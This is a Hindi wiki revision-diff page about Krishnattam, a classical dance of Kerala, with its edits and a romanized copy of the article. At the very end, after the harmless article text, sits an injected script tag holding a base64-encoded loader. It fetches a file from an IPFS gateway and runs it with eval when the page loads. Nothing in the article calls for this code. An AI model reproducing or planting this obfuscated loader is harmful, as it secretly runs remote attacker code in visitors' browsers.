Difference between revisions of "कृष्णाट्टम नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*[[भारत]] में प्रचलित कुछ प्रमुख [[शास्त्रीय नृत्य]] शैलियों में से एक कृष्णनआट्टम नृत्य है।
+
[[चित्र:Krishnanattam.jpg|thumb|250px|कृष्णअट्टम नृत्य]]
*लगातार आठ रातों तक चलने वाली कृष्णनआट्टम नृत्य शैली में भगवान [[कृष्ण]] के सम्पूर्ण चरित्र का किया जाता है।  
+
'''कृष्णअट्टम नृत्य''' [[भारत]] में प्रचलित कुछ प्रमुख [[शास्त्रीय नृत्य]] शैलियों में से एक है।
 +
*लगातार आठ रातों तक चलने वाली कृष्णअट्टम नृत्य शैली में भगवान [[कृष्ण]] के सम्पूर्ण चरित्र का किया जाता है।  
 
*यह [[कथकली]] से मिलती-जुलती शैली का नृत्य है।
 
*यह [[कथकली]] से मिलती-जुलती शैली का नृत्य है।
*कृष्णनआट्टम नृत्य [[केरल]] में प्रचलित है।
+
*कृष्णअट्टम नृत्य [[केरल]] में प्रचलित है।
  
{{प्रचार}}
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 14: Line 14:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{नृत्य कला}}
 
{{नृत्य कला}}
 +
[[Category:केरल]]
 
[[Category:शास्त्रीय नृत्य]]
 
[[Category:शास्त्रीय नृत्य]]
 
[[Category:नृत्य कला]]
 
[[Category:नृत्य कला]]
 
[[Category:कला कोश]]
 
[[Category:कला कोश]]
 
[[Category:संस्कृति कोश]] __INDEX__
 
[[Category:संस्कृति कोश]] __INDEX__

Revision as of 09:29, 8 July 2012

thumb|250px|krishnaattam nrity krishnaattam nrity bharat mean prachalit kuchh pramukh shastriy nrity shailiyoan mean se ek hai.

  • lagatar ath ratoan tak chalane vali krishnaattam nrity shaili mean bhagavan krishna ke sampoorn charitr ka kiya jata hai.
  • yah kathakali se milati-julati shaili ka nrity hai.
  • krishnaattam nrity keral mean prachalit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>